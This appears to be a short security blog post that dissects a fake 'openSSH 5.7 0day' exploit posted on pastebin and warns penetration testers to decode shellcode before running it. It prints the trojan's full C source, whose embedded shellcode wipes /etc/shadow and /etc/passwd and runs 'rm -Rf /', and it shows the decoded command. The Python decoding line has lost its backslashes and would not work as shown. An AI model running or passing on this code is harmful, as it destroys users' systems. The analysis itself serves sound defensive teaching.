Analyzing a shellcode is always instructive, it can give the penetration tester hints about what is used in it, or the penetration tester can learn about the techniques used, but he might also prevent himself to use destructive shellcodes.
After a few searches on the Internet I found a pastebin page to illustrate my example.
The following page (here) claims that there is a 0 day exploit for openSSH 5.7 0day exploit. The page do not give any instructions, and displays a basic C code to compile with GCC on a linux machine. Below you can see the code :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
/* openSSH 5.7 0day exploit Off by One error in auth2-pubkey.c Author: Chroniccommand Usage: ./exploit greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;) */ #include #include #include #include #include #include #include #include #include void usage(char *argv[]) { printf("Usage: %s \n", argv[0]); exit(1); } unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65" "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22" "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20" "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1" "\xcd\x80"; int main(int argc, char *argv[]) { int uid = getuid(); int port = 22, sock; struct hostent *host; struct sockaddr_in addr; if(uid !=0) { fprintf(stderr, "[!!]Error: You must be root\n"); exit(1); } if(uid == 0) { printf("\t[+]Starting exploit..\n"); } if(argc != 3) usage(argv); fprintf(stderr, "[!!]Exploit failed\n"); (*(void(*)())shellcode)(); exit(1); char payload[1024]; memcpy(payload, &shellcode, sizeof(shellcode)); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { printf("[+]Got shell\n"); system("/bin/sh"); } else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1) { fprintf(stderr, "[!!]Exploit failed\n"); exit(1); } } |
The exploit seems to be fine, and I guess a lot of people tried that exploit on their own machine, without looking inside the exploit. Before executing that exploit, this is what they should have done, and this is actually what you should always do !
- Analyse it without executing it
Below you may see how to reverse an exploit with Perl or Python :
1 2 |
$perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74 \x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' > exploit |
1 |
$strings exploit |
or in Python
1 2 |
$python -c 'print "x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x39x00x00x00x65x63x68x6fx20x22x22x20x3ex20 x2fx65x74x63x2fx73x68x61x64x6fx77x20x3bx20x65x63x68x6fx20x22x22x20x3ex20x2fx65x74x63x2fx70x61x73x73x77x64x20x3bx20x72x6dx20x2dx52x66x20x2fx00x57x53x89xe1xcdx80"' > exploit |
1 |
$strings exploit |
And this is the result that you should obtain:
1 2 3 4 |
Rfh-c h/sh h/bin echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / |
As shown in the previous table the code tries to execute the a “rm -Rf” on our hard drive and delete everything !
That’s why it is important to always reverse the shellcodes you are using before hand !
Post a Comment